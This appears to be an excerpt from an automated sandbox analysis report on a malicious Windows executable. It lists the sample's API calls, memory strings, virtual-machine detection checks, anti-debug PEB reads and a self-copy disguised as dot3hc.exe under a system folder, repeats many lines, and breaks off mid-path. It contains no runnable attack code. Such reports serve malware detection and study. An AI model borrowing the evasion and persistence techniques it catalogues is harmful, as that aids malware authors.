                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]f5~
                Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]f5~
                Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02120456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021269AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02120456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021269AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02174E10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02173F70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_020E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FBA SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FCE SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FBA SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FCE SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00409FBA SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00409FCE SetUnhandledExceptionFilter,
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\